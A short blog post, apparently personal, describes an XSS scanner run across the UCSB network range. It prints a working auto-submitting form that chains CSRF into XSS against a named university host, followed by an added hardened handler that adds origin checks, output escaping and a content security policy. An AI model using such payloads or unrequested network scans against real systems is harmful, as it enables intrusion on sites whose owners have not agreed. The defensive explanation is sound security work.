Breaking UCSB.edu for Fun
Background
I wrote a black-box XSS scanner and scanned 128.111.0.0/16 (the UCSB network). The scanner found a few XSS vulnerabilities at sbfel3.ucsb.edu.
Demo
The vulnerability is somewhat straightforward: old site + old technology = XSS. It is likely not important, but popping up something at *.ucsb.edu gives me no end of pleasure :)
Payload
Using CSRF to trigger the self-XSS.
Hosted at https://scf.so/assets/ucsb-xss.html
<form action="http://sbfel3.ucsb.edu/bin/search" method="post">
<input type="" name="req" value='<img src="x" onerror="alert(`XSS`)" />'>
<input type="submit" id="sub">
</form>
<script type="text/javascript">
sub.click()
</script>
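
The form above works for two separate reasons: the search endpoint accepts a POST from any origin, and it echoes `req` into the response without encoding. The following is an added example, not part of the original post and not the site's code, showing both checks on the server side. The handler shape, `handleSearch`, `isSameSiteRequest`, `ALLOWED_ORIGINS` and the response markup are assumptions made for illustration.

```javascript
// Added example: hypothetical hardened handler for POST /bin/search.
// Assumption: the only origin allowed to submit the search form is the site itself.
const ALLOWED_ORIGINS = new Set(["http://sbfel3.ucsb.edu"]);

// The payload from the post, used as constructed test input.
const PAGE_PAYLOAD = '<img src="x" onerror="alert(`XSS`)" />';

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#39;", "`": "&#96;",
};

// Encode a value for placement in HTML element content or a quoted attribute.
function escapeHtml(value) {
  return String(value).replace(/[&<>"'`]/g, (ch) => HTML_ESCAPES[ch]);
}

// True only when the request came from a page on an allowed origin.
// Header names are lowercase, as Node's http module delivers them.
function isSameSiteRequest(headers) {
  if (headers.origin !== undefined) return ALLOWED_ORIGINS.has(headers.origin);
  if (headers.referer === undefined) return false; // no provenance: refuse
  try {
    return ALLOWED_ORIGINS.has(new URL(headers.referer).origin);
  } catch {
    return false; // malformed Referer
  }
}

// headers: request headers; form: parsed POST body ({ req: "..." }).
function handleSearch(headers, form) {
  if (!isSameSiteRequest(headers)) {
    return { status: 403, headers: {}, body: "Cross-site form submission rejected" };
  }
  const req = typeof form.req === "string" ? form.req : "";
  return {
    status: 200,
    headers: {
      "Content-Type": "text/html; charset=utf-8",
      // Defence in depth: inline event handlers such as onerror do not run.
      "Content-Security-Policy": "default-src 'self'; script-src 'self'",
    },
    body: `<p>Results for: ${escapeHtml(req)}</p>`,
  };
}
```

The Origin check stops the auto-submitting form, which is what turns the self-XSS into something a third party can trigger. The output encoding fixes the injection itself and is the change that matters if only one can be made.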